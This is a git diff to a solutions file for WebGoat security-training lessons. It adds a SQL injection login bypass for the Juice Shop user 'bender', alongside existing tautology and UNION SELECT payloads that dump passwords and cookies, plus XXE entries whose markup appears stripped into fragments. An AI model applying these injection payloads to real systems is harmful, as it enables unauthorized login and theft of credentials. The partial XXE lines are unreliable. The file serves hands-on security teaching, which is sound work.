diff --git a/webgoat-lessons/sol.txt b/webgoat-lessons/sol.txt index c686e4396..9fa1aa3a4 100644 --- a/webgoat-lessons/sol.txt +++ b/webgoat-lessons/sol.txt @@ -3,6 +3,9 @@ Basic Smith - to show it returns smith's records Smith' or '1'='1 - to show exploit; 1=1 can be any true clause +**Bender Login +bender@juice-sh.op' -- + [2:19 PM] 101 101 or 1=1 @@ -11,7 +14,7 @@ Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from ## XXE ## -Simple - ]> &root;test +Simple ]> &root;test Modern Rest Framework - change content type to: Content-Type: application/xml && ]> &root;test